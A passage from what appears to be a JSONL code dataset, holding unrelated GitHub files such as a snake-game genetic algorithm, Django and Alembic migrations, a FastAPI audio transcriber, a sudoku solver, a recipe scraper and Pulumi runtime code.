__SEC_FETCH_SITE,\n \"sec-fetch-user\": __SEC_FETCH_USER,\n \"upgrade-insecure-requests\": __UPGRADE_INSECURE_REQUESTS,\n \"Referer\": \"https://girlimg.epio.app/article/detail/{}\",\n \"user-agent\": __USER_AGENT\n}\n","repo_name":"YeungShaoFeng/libxib","sub_path":"cfg.py","file_name":"cfg.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8969668376","text":"import numpy as np\nfrom .genetic_neural_net import *\n\n## Code to import file at runtime from separate root folder\nimport sys\nsys.path.insert(1, '../')\nimport snake_game\nimport snake_utils\n\ndef get_button_direction(direction):\n button_direction = \"LEFT\"\n if direction.tolist() == [10, 0]:\n button_direction = \"RIGHT\"\n elif direction.tolist() == [-10, 0]:\n button_direction = \"LEFT\"\n elif direction.tolist() == [0, 10]:\n button_direction = \"DOWN\"\n else:\n button_direction = \"UP\"\n\n return button_direction\n\ndef run_snake_with_genetic(weights):\n total_steps_per_game = 2500\n 
maximum_score = 0\n\n snake_start, snake_body, food_position, score = snake_game.get_starting_positions()\n for _ in range(total_steps_per_game):\n is_front_blocked, is_left_blocked, is_right_blocked = snake_utils.get_blocked_directions(\n snake_body)\n\n food_direction_vector_normalized, snake_direction_vector_normalized = snake_utils.get_food_and_direction_vectors(\n snake_body, food_position)\n\n predicted_direction = np.argmax(np.array(feed_forward(np.array(\n [is_left_blocked, is_front_blocked, is_right_blocked, food_direction_vector_normalized[0],\n snake_direction_vector_normalized[0], food_direction_vector_normalized[1],\n snake_direction_vector_normalized[1]]).reshape(-1, 7), weights))) - 1\n\n updated_direction = np.array(snake_body[0]) - np.array(snake_body[1])\n if predicted_direction == -1:\n updated_direction = np.array([updated_direction[1], -updated_direction[0]])\n if predicted_direction == 1:\n updated_direction = np.array([-updated_direction[1], updated_direction[0]])\n\n button_direction = get_button_direction(updated_direction)\n\n dir, snake_body, food_position, score, has_snake_collided = snake_game.run_snake_game_with_iterations(button_direction, button_direction, snake_start, food_position, snake_body, True, score)\n \n if has_snake_collided:\n break\n\n if score > maximum_score:\n maximum_score = score\n return maximum_score\n","repo_name":"Rajpal02/AI-Algos---Snake-game","sub_path":"Genetic_Algo/run_snake_game.py","file_name":"run_snake_game.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6746999390","text":"from django.core.management.base import BaseCommand, CommandError\n\nfrom pages.models import Page\n\n\nclass Command(BaseCommand):\n help = \"\"\"Remove Published Pages without Drafts\"\"\"\n\n def add_arguments(self, parser):\n parser.add_argument('page_list', nargs = '+', type = str)\n parser.add_argument(\n '--force',\n action = 'store_true',\n dest = 'force',\n help = 'Do not prompt the user before removing a matching lone Page.',\n )\n\n def handle(self, *args, **options):\n count = 0\n urls = str(options['page_list'][0]).split(', ')\n \n print(urls)\n for url in urls:\n qs = Page.objects.filter(url=url) \n lone_page = None \n if qs.count() == 1:\n lone_page = qs.first()\n elif qs.count() == 3:\n if qs[0].title == qs[1].title:\n lone_page = qs[2]\n elif qs[1].title == qs[2].title:\n lone_page = qs[0]\n elif qs[0].title == qs[2].title:\n lone_page = qs[1]\n else:\n self.stdout.write(\"%s has %s Entries. 
None Removed\" % (url, qs.count()))\n\n if lone_page: \n if options['force']: \n self.stdout.write(\"Deleting %s\" % lone_page)\n lone_page.delete()\n count += 1 \n else:\n rm = input(\"Would you like to delete \"+ lone_page.title+ \"?(Y/n)\")\n if rm == 'Y':\n lone_page.delete()\n count += 1\n else: \n self.stdout.write(\"Did not Delete\")\n self.stdout.write(\"Deleted %s Pages\" % count)\n return count\n ","repo_name":"furmanczyk5/Django-Enterprise-App","sub_path":"pages/management/commands/remove_pages.py","file_name":"remove_pages.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"4009846377","text":"import img2pdf\nimport os\n\nalllist = os.listdir(\".\")\nphotolist=[]\nfor x in alllist:\n if x.endswith(\".png\") or x.endswith(\".jpg\"):\n photolist.append(x)\n\npdf = img2pdf.convert(photolist)\n\nfile = open(\"assignment.pdf\",\"wb\")\n\nfile.write(pdf)\nfile.close()\n","repo_name":"subodhstha/learning-python-for-automation","sub_path":"day2/assignment/assignment2.py","file_name":"assignment2.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"43025057694","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"\nDrop Macaroon description limit\n\nRevision ID: eb736cb3236d\nRevises: cc06bd67a61b\nCreate Date: 2023-03-07 21:29:53.314390\n\"\"\"\n\nimport sqlalchemy as sa\n\nfrom alembic import op\n\nrevision = \"eb736cb3236d\"\ndown_revision = \"cc06bd67a61b\"\n\n\ndef upgrade():\n op.alter_column(\n \"macaroons\",\n \"description\",\n existing_type=sa.VARCHAR(length=100),\n type_=sa.String(),\n existing_nullable=False,\n )\n\n\ndef downgrade():\n raise RuntimeError(\"Order No. 
227 - Ни шагу назад!\")\n","repo_name":"pypi/warehouse","sub_path":"warehouse/migrations/versions/eb736cb3236d_drop_macaroon_description_limit.py","file_name":"eb736cb3236d_drop_macaroon_description_limit.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":3382,"dataset":"github-code","pt":"3"} +{"seq_id":"31763431876","text":"import shutil\nfrom fastapi import APIRouter, Depends, UploadFile\nfrom sqlalchemy.orm import Session\nfrom core.config import settings\nfrom sql_app.crud import get_mp3_transcriber_by_id\nfrom sql_app.models import MP3Transcriber, User\n\nfrom sql_app.session import get_db\nfrom mp3_transcriber.utils import get_large_audio_transcription, get_sentiment\nfrom users.api_route import get_current_user_from_token\nfrom fastapi_limiter.depends import RateLimiter\n\nrouter = APIRouter()\n\n\n@router.post(\"/upload-mp3\")\ndef create_upload_file(\n file: UploadFile,\n db: Session = Depends(get_db),\n current_user: User = Depends(get_current_user_from_token),\n limit_second = Depends(RateLimiter(times=1, seconds=1)),\n limit_min = Depends(RateLimiter(times=10, seconds=60))\n):\n mp3_transcriber = MP3Transcriber(content=file)\n mp3_transcriber.name = file.filename\n with open(file.filename, \"wb\") as buffer:\n shutil.copyfileobj(file.file, buffer)\n mp3_transcriber.plain_text = get_large_audio_transcription(file.filename)\n try:\n mp3_transcriber.sentiment_analysis = get_sentiment(mp3_transcriber.plain_text)\n except:\n pass\n db.add(mp3_transcriber)\n db.commit()\n db.refresh(mp3_transcriber)\n return mp3_transcriber\n\n\n@router.post(\"/count-words\")\ndef count_words(\n id: int,\n word: str,\n db: Session = Depends(get_db),\n current_user: User = Depends(get_current_user_from_token),\n limit_second = Depends(RateLimiter(times=1, seconds=1)),\n limit_min = Depends(RateLimiter(times=10, seconds=60))\n):\n mp3_transcriber = get_mp3_transcriber_by_id(id, db)\n ocurrence = mp3_transcriber.plain_text.lower().count(word.lower())\n return ocurrence\n","repo_name":"emmanuel-santos1/mp3_transcriber","sub_path":"mp3_transcriber/api_route.py","file_name":"api_route.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11589429793","text":"\"\"\"Expose a class for tokenization.\"\"\"\nfrom logging import getLogger\nfrom typing import List\nimport os\nimport MeCab\n\n\nclass MecabTokenizer:\n \"\"\"A Tokenizer that uses MeCab.\"\"\"\n\n logger = getLogger(__name__)\n\n def __init__(self, tagger: MeCab.Tagger):\n \"\"\"Take a client for MeCab.\"\"\"\n self.tagger = tagger\n\n def __call__(self, text: str) -> List[str]:\n \"\"\"Tokenize a text.\"\"\"\n segments = self.tagger.parse(text)\n tokens = [segment.split('\\t')[0]\n for segment in segments.split(os.linesep)][:-2]\n return tokens\n\n def __getstate__(self):\n \"\"\"Exclude :py:attr:`tagger` because it is not picklable.\"\"\"\n return {}\n\n def __setstate__(self, _):\n \"\"\"Revert :py:attr:`tagger`.\n\n Set :py:attr:`tagger` to a new :py:class:`MeCab.Tagger` object.\n \"\"\"\n self.tagger = self._create_tagger()\n self.logger = getLogger(__name__)\n\n @classmethod\n def create(cls):\n \"\"\"Create a :py:class:`MecabTokenizer` object.\"\"\"\n return MecabTokenizer(cls._create_tagger())\n\n @classmethod\n def _create_tagger(\n cls, \n dicdir=os.getenv('MECAB_DICDIR', None),\n userdic=os.getenv('MECAB_USERDIC', None)\n ) -> MeCab.Tagger:\n \"\"\"Create a :py:class:`MeCab.Tagger` 
object.\"\"\"\n cls.logger.info('mecab system dictionary is %s.', dicdir)\n cls.logger.info('mecab user dictionary is %s.', userdic)\n\n args = ''\n if dicdir:\n args = f'-d {dicdir}'\n if userdic:\n args = f'{args} -u {userdic}' if args else f'-u {userdic}'\n if len(args) == 0:\n return MeCab.Tagger()\n return MeCab.Tagger(args)\n","repo_name":"nryotaro/serial-mecab","sub_path":"serialmecab/tokenizer.py","file_name":"tokenizer.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8912895931","text":"from BeautifulSoup import BeautifulSoup\nimport requests\nimport pandas as pd\nimport re\nimport sys\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nFOOD_TYPES = open('food_types.txt').readlines()\nBASE_URL = 'http://www.maangchi.com/'\nHEADERS = {'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0'}\n\ndef main():\n\tfetch_recipe_urls()\n\ndef fetch_recipe_urls():\n\tdf = pd.DataFrame(columns=['english_name', 'korean_name' ,'type', 'url'])\n\tfor food_type in FOOD_TYPES:\n\t\tdf = df.append(get_recipe_names_by_food_type(food_type.split('\\n')[0]))\n\t\n\tdf.to_csv('maangchi_foods.csv', sep='\\t', encoding='utf-8')\n\treturn df\n\ndef get_recipe_names_by_food_type(food_type):\t\n\turl = BASE_URL + ('recipes/%s' % food_type)\n\tresponse = requests.get(url, headers=HEADERS)\n\n\tsoup = BeautifulSoup(response.text)\n\trecipes = soup.findAll(id=re.compile('^post-'))\n\trecipe_urls = []\n\trecipe_english_names = []\n\trecipe_korean_names = []\n\tfor i in xrange(len(recipes)):\n\t\trecipe_urls.append(recipes[i].a['href'])\n\t\trecipe_english_names.append(recipes[i].a['title'])\n\t\trecipe_korean_names.append(str(recipes[i].p).split('<br />\\n')[1][:-4])\n\ttypes = [food_type] * len(recipe_urls)\n\treturn pd.DataFrame({'english_name':recipe_english_names, 'korean_name':recipe_korean_names, 'type':types, 'url':recipe_urls})\n\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"thomasaeyo/Easy-Recipe","sub_path":"maangchi_scraper.py","file_name":"maangchi_scraper.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7740717666","text":"import dictionaries\nfrom termcolor import colored\n\n\nBOARD_WIDTH = 80\nBOARD_HEIGHT = 20\n\nlist_labels = [\"Type\", \"Level of difficulty\"]\n\ngame_player = {'race': ['1', '2', '3'],\n 'Level_of_difficulty': ['1', '2', '3'], }\n\n\ndef user_info(list_labels):\n print(\"\\nYou can choose who you want to be :D \\nYour options: (1)Man, (2) or (3)Adolescent\\n\")\n\n for elem in range(len(list_labels)):\n user_answer = input(str(list_labels[elem])+\" : \")\n if elem == 0:\n if user_answer not in game_player['race']:\n raise Exception(colored(\"It's not acceptable choice. Try again\\n\", \"red\"))\n else:\n if user_answer == '1':\n print(colored(\"You are a Man so you are more powerful than you think\", 'magenta'))\n dictionaries.player['player_power'] = 5\n elif user_answer == '2':\n print(colored(\"You chose ... and you get ... 
:D!!!It can be useful later\", 'magenta'))\n dictionaries.player['additional_elements'] = ''\n elif user_answer == '3':\n print(colored(\"Hello little boy ;) Because you're still a child, You get a more life_points \", 'magenta'))\n dictionaries.player['player_life'] = 2\n print(\"\\nOptions: (1) Easy, (2) Medium, (3) Hard \\n\")\n elif elem == 1:\n if user_answer not in game_player['Level_of_difficulty']:\n raise Exception(colored(\"You choose only (1)Easy ,(2) Medium or (3)Hard level of difficulty\\n\", \"red\"))\n else:\n if user_answer == '1':\n dictionaries.player['player_life'] = dictionaries.player['player_life'] + 5\n elif user_answer == '2':\n dictionaries.player['player_life'] = dictionaries.player['player_life'] + 3\n elif user_answer == '3':\n dictionaries.player['player_life'] = dictionaries.player['player_life'] + 1\n\n dictionaries.player[list_labels[elem]] = user_answer\n\n\ndef data_to_print(data):\n keys = [\"Type\", \"Level of difficulty\"]\n data_print = {key: dictionaries.player[key] for key in keys}\n for key in data_print:\n if key == \"Type\":\n if data_print[key] == '1':\n data_print[key] = 'Man'\n elif data_print[key] == '2':\n data_print[key] = '...'\n else:\n data_print[key] = 'Adolescent'\n elif key == \"Level of difficulty\":\n if data_print[key] == '1':\n data_print[key] = 'Easy'\n elif data_print[key] == '2':\n data_print[key] = 'Medium'\n else:\n data_print[key] = 'Hard'\n return data_print\n","repo_name":"iuli988/Projects","sub_path":"roguelike-game/players.py","file_name":"players.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7430716855","text":"import asyncio\nimport os\nfrom typing import Optional, TYPE_CHECKING\nimport grpc\n\nfrom .. import log\nfrom .. import _types\nfrom ..invoke import InvokeOptions\nfrom ..runtime.proto import provider_pb2\nfrom . import rpc\nfrom .rpc_manager import RPC_MANAGER\nfrom .settings import get_monitor, handle_grpc_error\nfrom .sync_await import _sync_await\n\nif TYPE_CHECKING:\n from .. import Inputs\n\n# This setting overrides a hardcoded maximum protobuf size in the python protobuf bindings. This avoids deserialization\n# exceptions on large gRPC payloads, but makes it possible to use enough memory to cause an OOM error instead [1].\n# Note: We hit the default maximum protobuf size in practice when processing Kubernetes CRDs [2]. If this setting ends\n# up causing problems, it should be possible to work around it with more intelligent resource chunking in the k8s\n# provider.\n#\n# [1] https://github.com/protocolbuffers/protobuf/blob/0a59054c30e4f0ba10f10acfc1d7f3814c63e1a7/python/google/protobuf/pyext/message.cc#L2017-L2024\n# [2] https://github.com/pulumi/pulumi-kubernetes/issues/984\n#\n# This setting requires a platform-specific and python version-specific .so file called\n# `_message.cpython-[py-version]-[platform].so`, which is not present in situations when a new python version is\n# released but the corresponding dist wheel has not been. 
So, we wrap the import in a try/except to avoid breaking all\n# python programs using a new version.\ntry:\n from google.protobuf.pyext._message import SetAllowOversizeProtos # pylint: disable-msg=E0611\n SetAllowOversizeProtos(True)\nexcept ImportError:\n pass\n\n\nclass InvokeResult:\n \"\"\"\n InvokeResult is a helper type that wraps a prompt value in an Awaitable.\n \"\"\"\n def __init__(self, value):\n self.value = value\n\n # pylint: disable=using-constant-test\n def __await__(self):\n # We need __await__ to be an iterator, but we only want it to return one value. As such, we use\n # `if False: yield` to construct this.\n if False:\n yield self.value\n return self.value\n\n __iter__ = __await__\n\n\ndef invoke(tok: str, props: 'Inputs', opts: Optional[InvokeOptions] = None, typ: Optional[type] = None) -> InvokeResult:\n \"\"\"\n invoke dynamically invokes the function, tok, which is offered by a provider plugin. The inputs\n can be a bag of computed values (Ts or Awaitable[T]s), and the result is a Awaitable[Any] that\n resolves when the invoke finishes.\n \"\"\"\n log.debug(f\"Invoking function: tok={tok}\")\n if opts is None:\n opts = InvokeOptions()\n\n if typ and not _types.is_output_type(typ):\n raise TypeError(\"Expected typ to be decorated with @output_type\")\n\n async def do_invoke():\n # If a parent was provided, but no provider was provided, use the parent's provider if one was specified.\n if opts.parent is not None and opts.provider is None:\n opts.provider = opts.parent.get_provider(tok)\n\n # Construct a provider reference from the given provider, if one was provided to us.\n provider_ref = None\n if opts.provider is not None:\n provider_urn = await opts.provider.urn.future()\n provider_id = (await opts.provider.id.future()) or rpc.UNKNOWN\n provider_ref = f\"{provider_urn}::{provider_id}\"\n log.debug(f\"Invoke using provider {provider_ref}\")\n\n monitor = get_monitor()\n inputs = await rpc.serialize_properties(props, {})\n version = opts.version or \"\"\n accept_resources = not (os.getenv(\"PULUMI_DISABLE_RESOURCE_REFERENCES\", \"\").upper() in {\"TRUE\", \"1\"})\n log.debug(f\"Invoking function prepared: tok={tok}\")\n req = provider_pb2.InvokeRequest(\n tok=tok,\n args=inputs,\n provider=provider_ref,\n version=version,\n acceptResources=accept_resources,\n )\n\n def do_invoke():\n try:\n return monitor.Invoke(req)\n except grpc.RpcError as exn:\n handle_grpc_error(exn)\n\n resp = await asyncio.get_event_loop().run_in_executor(None, do_invoke)\n\n log.debug(f\"Invoking function completed successfully: tok={tok}\")\n # If the invoke failed, raise an error.\n if resp.failures:\n raise Exception(f\"invoke of {tok} failed: {resp.failures[0].reason} ({resp.failures[0].property})\")\n\n # Otherwise, return the output properties.\n ret_obj = getattr(resp, 'return')\n if ret_obj:\n deserialized = rpc.deserialize_properties(ret_obj)\n # If typ is not None, call translate_output_properties to instantiate any output types.\n return rpc.translate_output_properties(deserialized, lambda prop: prop, typ) if typ else deserialized\n return {}\n\n async def do_rpc():\n resp, exn = await RPC_MANAGER.do_rpc(\"invoke\", do_invoke)()\n if exn is not None:\n raise exn\n return resp\n\n return 
InvokeResult(_sync_await(asyncio.ensure_future(do_rpc())))\n","repo_name":"adriell/lambda-autoservico-storagegateway","sub_path":"dependencies/pulumi/runtime/invoke.py","file_name":"invoke.py","file_ext":"py","file_size_in_byte":5033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15567913050","text":"\"\"\"empty message\n\nRevision ID: ac416eea4e1f\nRevises: 529d01a75828\nCreate Date: 2022-02-16 22:02:56.576269\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ac416eea4e1f'\ndown_revision = '529d01a75828'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('user', sa.Column('phone', sa.String(length=13), nullable=True))\n op.add_column('user', sa.Column('address', sa.String(length=255), nullable=True))\n op.add_column('user', sa.Column('city', sa.String(length=255), nullable=True))\n op.add_column('user', sa.Column('state', sa.String(length=255), nullable=True))\n op.add_column('user', sa.Column('zip_code', sa.Integer(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('user', 'zip_code')\n op.drop_column('user', 'state')\n op.drop_column('user', 'city')\n op.drop_column('user', 'address')\n op.drop_column('user', 'phone')\n # ### end Alembic commands ###\n","repo_name":"wglahn/CT-Project-Bridge-E-Commerce","sub_path":"migrations/versions/ac416eea4e1f_.py","file_name":"ac416eea4e1f_.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6067879372","text":"while True:\n conjunto = input().split()\n\n m, n = int(conjunto[0]), int(conjunto[1])\n\n maior = max(m, n)\n menor = min(m, n)\n\n if m <= 0 or n <= 0:\n break\n else:\n cont = 0\n for numero in range(menor, maior + 1):\n cont += numero\n print(f\"{numero} \", end=\"\")\n\n print(f\"Sum={cont}\")\n","repo_name":"brenodocarmo/Exercicios-programacao","sub_path":"uri-online/1101.py","file_name":"1101.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"28130261311","text":"import feedparser\nimport os\nimport pinecone\nimport numpy as np\nimport openai\nimport requests\nfrom bs4 import BeautifulSoup\nfrom retrying import retry\n\n@retry(wait_exponential_multiplier=1000, wait_exponential_max=10000)\ndef create_embedding(article):\n # vectorize with OpenAI text-emebdding-ada-002\n embedding = openai.Embedding.create(\n input=article,\n model=\"text-embedding-ada-002\"\n )\n\n return embedding[\"data\"][0][\"embedding\"]\n\n\n# OpenAI API key\nopenai.api_key = os.getenv('OPENAI_API_KEY')\n\n# get the Pinecone API key and environment\npinecone_api = os.getenv('PINECONE_API_KEY')\npinecone_env = os.getenv('PINECONE_ENVIRONMENT')\n\npinecone.init(api_key=pinecone_api, environment=pinecone_env)\n\nif \"blog-index\" not in pinecone.list_indexes():\n print(\"Index does not exist. Creating...\")\n pinecone.create_index(\"blog-index\", 1536)\nelse:\n print(\"Index already exists. 
Deleting...\")\n pinecone.delete_index(\"blog-index\")\n print(\"Creating new index...\")\n pinecone.create_index(\"blog-index\", 1536)\n\n# set index; must exist\nindex = pinecone.Index('blog-index')\n\n# URL of the RSS feed to parse\nurl = 'https://blog.baeke.info/feed/'\n\n# Parse the RSS feed with feedparser\nfeed = feedparser.parse(url)\n\n# get number of entries in feed\nentries = len(feed.entries)\nprint(\"Number of entries: \", entries)\n\npost_texts = []\npinecone_vectors = []\nfor i, entry in enumerate(feed.entries[:50]):\n # report progress\n print(\"Create embedding for entry \", i, \" of \", entries)\n\n r = requests.get(entry.link)\n soup = BeautifulSoup(r.text, 'html.parser')\n article = soup.find('div', {'class': 'entry-content'}).text\n\n # create embedding\n vector = create_embedding(article)\n\n # append tuple to pinecone_vectors list\n pinecone_vectors.append((str(i), vector, {\"url\": entry.link}))\n\n# all vectors can be upserted to pinecode in one go\nupsert_response = index.upsert(vectors=pinecone_vectors)\n\nprint(\"Vector upload complete.\")\n\n\n\n\n","repo_name":"gbaeke/gpt-vectors","sub_path":"console/upload_vectors.py","file_name":"upload_vectors.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"3"} +{"seq_id":"12525972119","text":"from flask import Flask, render_template, request, jsonify, make_response\nimport json\nimport re\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n \"\"\"Render the input search field\"\"\"\n return render_template('index.html')\n\n\n@app.route('/search')\ndef search():\n \"\"\"Match the input string by user with the addresses in addresses.json file\n and return matching suggestions in the form of a list i.e suggested_addr\"\"\"\n q = request.args.get('q').strip()\n\n with open('static/addresses.json', 'r') as f:\n data = json.loads(f.read())\n suggested_addr = []\n for d in data:\n for keys,vals in d.items():\n if q in vals:\n suggested_addr.append(d)\n break\n\n resp = make_response(jsonify(suggested_addr[:10]))\n resp.headers['Access-Control-Allow-Origin'] = \"*\"\n return resp\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n\n\n","repo_name":"pawan0410/flask_address_autocomplete_api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14356866819","text":"# 《programming for the puzzled》实操\n# 14.数独问题\n\n\nimport copy\n\n\nbacktracks = 0\n\n\n# 递归解数独\ndef solveSudoku(grid, i=0, j=0):\n global backtracks\n i, j = findNextCellToFill(grid)\n if i == -1:\n return True\n for e in range(1, 10):\n if isValid(grid, i, j, e):\n grid[i][j] = e\n if solveSudoku(grid, i, j):\n return True\n backtracks += 1\n grid[i][j] = 0\n return False\n\n\n# 找到下一个格子\ndef findNextCellToFill(grid):\n for x in range(0, 9):\n for y in range(0, 9):\n if grid[x][y] == 0:\n return x, y\n return -1, -1\n \n \n# 判断i,j格子能否放数字e。\ndef isValid(grid, i, j, e):\n # 检查行\n rowOk = all([e != grid[i][x] for x in range(9)])\n if rowOk:\n # 检查列\n columnOk = all([e != grid[x][j] for x in range(9)])\n if columnOk:\n # 检查小方块\n secTopX, secTopY = 3*(i//3), 3*(j//3)\n for x in range(secTopX, secTopX+3):\n for y in range(secTopY, secTopY+3):\n if grid[x][y] == e:\n return False\n return True\n return False\n \n \n# 输出数独\ndef printSudoku(grid):\n numrow = 0\n for row in grid:\n if numrow % 3 == 0 and numrow != 0:\n print(\" \")\n 
print(row[0:3], \" \", row[3:6], \" \", row[6:9])\n numrow += 1\n \n \nbacktracks2 = 0\n# 递归解数独,使用隐含信息\ndef solveSudokuOpt(grid, i=0, j=0):\n global backtracks2\n i, j = findNextCellToFill(grid)\n if i == -1:\n return True\n for e in range(1, 10):\n if isValid(grid, i, j, e):\n impl = makeImplications(grid, i, j, e)\n if solveSudoku(grid, i, j):\n return True\n backtracks2 += 1\n undoImplications(grid, impl)\n return False\n \n \ndef undoImplications(grid, impl):\n for i in range(len(impl)):\n grid[impl[i][0]][impl[i][1]] = 0\n \n \nsectors = [[0, 3, 0, 3], [3, 6, 0, 3], [6, 9, 0, 3],[0, 3, 3, 6], [3, 6, 3, 6], [6, 9, 3, 6],[0, 3, 6, 9], [3, 6, 6, 9], [6, 9, 6, 9]]\n\n\ndef makeImplications(grid, i, j, e):\n global sections\n grid[i][j] = e\n impl = [(i, j, e)]\n for k in range(len(sectors)):\n sectinfo = []\n vset = {1,2,3,4,5,6,7,8,9}\n for x in range(sectors[k][0], sectors[k][1]):\n for y in range(sectors[k][2], sectors[k][3]):\n if grid[x][y] != 0:\n vset.remove(grid[x][y])\n for x in range(sectors[k][0], sectors[k][1]):\n for y in range(sectors[k][2], sectors[k][3]):\n if grid[x][y] == 0:\n sectinfo.append([x, y, vset.copy()])\n for m in range(len(sectinfo)):\n sin = sectinfo[m]\n rowv = set()\n for y in range(9):\n rowv.add(grid[sin[0]][y])\n left = sin[2].difference(rowv)\n colv = set()\n for x in range(9):\n colv.add(grid[x][sin[1]])\n left = left.difference(colv)\n if len(left) == 1:\n val = left.pop()\n if isValid(grid, sin[0], sin(1), val):\n grid[sin[0]][sin[1]] = val\n impl.append((sin[0], sin[1], val))\n return impl\n\n\nif __name__ == \"__main__\":\n input1 = [[5, 1, 7, 6, 0, 0, 0, 3, 4],\n [2, 8, 9, 0, 0, 4, 0, 0, 0],\n [3, 4, 6, 2, 0, 5, 0, 9, 0],\n [6, 0, 2, 0, 0, 0, 0, 1, 0],\n [0, 3, 8, 0, 0, 6, 0, 4, 7],\n [0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 9, 0, 0, 0, 0, 0, 7, 8],\n [7, 0, 3, 4, 0, 0, 5, 6, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0]]\n input2 = copy.copy(input1)\n solveSudoku(input1)\n printSudoku(input1)\n print(\"尝试次数:\", backtracks)\n solveSudokuOpt(input2)\n printSudoku(input2)\n print(\"尝试次数:\", backtracks2)\n ","repo_name":"zwdnet/MyQuant","sub_path":"44/14/sodu.py","file_name":"sodu.py","file_ext":"py","file_size_in_byte":3896,"program_lang":"python","lang":"en","doc_type":"code","stars":207,"dataset":"github-code","pt":"3"} +{"seq_id":"27551002166","text":"import hashlib\r\nimport sys\r\n\r\nPY2 = sys.version_info[0] == 2\r\nif PY2:\r\n unicode_type = unicode\r\nelse:\r\n unicode_type = str\r\n\r\n\r\ndef force_bytes(s, encoding=\"utf-8\", errors=\"strict\"):\r\n if isinstance(s, unicode_type):\r\n s = s.encode(encoding, errors)\r\n return s\r\n\r\n\r\nstr1 = \"abcd\"\r\nhashed = hashlib.md5(force_bytes(str1)).hexdigest()\r\nprint(hashed)\r\n","repo_name":"loggar/py","sub_path":"py-modules/six/md5.manual.py","file_name":"md5.manual.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21760594329","text":"\nfrom ..models import *\nfrom rest_framework import serializers\nfrom collections import OrderedDict\nfrom ..Views.V_TransactionNumberfun import SystemBatchCodeGeneration\nfrom .S_GSTHSNCode import * \n\n\nclass Partiesserializer(serializers.ModelSerializer):\n class Meta:\n model = M_Parties\n fields = ['id', 'Name']\n \n''' POST AND PUT Methods Serializers Save/Edit Create/Update '''\nclass O_BatchWiseLiveStockSerializer(serializers.ModelSerializer):\n class Meta:\n model = O_BatchWiseLiveStock\n fields = 
['Item','Quantity','Unit','OriginalBaseUnitQuantity','BaseUnitQuantity','Party','CreatedBy','InterBranchInward']\n \nclass O_LiveBatchesSerializer(serializers.ModelSerializer):\n \n O_BatchWiseLiveStockList = O_BatchWiseLiveStockSerializer(many=True)\n class Meta:\n model = O_LiveBatches\n fields = ['MRP','GST','Rate','BatchDate', 'BatchCode','SystemBatchDate','SystemBatchCode','ItemExpiryDate','OriginalBatchBaseUnitQuantity','O_BatchWiseLiveStockList']\n \n\n\nclass TC_InterBranchInwardReferencesSerializer(serializers.ModelSerializer):\n class Meta:\n model = TC_InterBranchInwardReferences\n fields = ['IBChallan'] \n\nclass TC_InterBranchInwardItemsSerializer(serializers.ModelSerializer):\n class Meta:\n model = TC_InterBranchInwardItems\n fields = ['Item', 'Quantity', 'Unit', 'BaseUnitQuantity', 'MRP', 'ReferenceRate', 'Rate', 'BasicAmount', 'TaxType', 'GST', 'GSTAmount',\n 'Amount', 'DiscountType', 'Discount', 'DiscountAmount', 'CGST', 'SGST', 'IGST', 'CGSTPercentage', 'SGSTPercentage', 'IGSTPercentage', 'BatchDate', 'BatchCode','SystemBatchCode','SystemBatchDate']\n\nclass T_InterBranchInwardSerializer(serializers.ModelSerializer):\n\n InterBranchInwardItems = TC_InterBranchInwardItemsSerializer(many=True)\n \n O_LiveBatchesList=O_LiveBatchesSerializer(many=True)\n \n InterBranchInwardReferences = 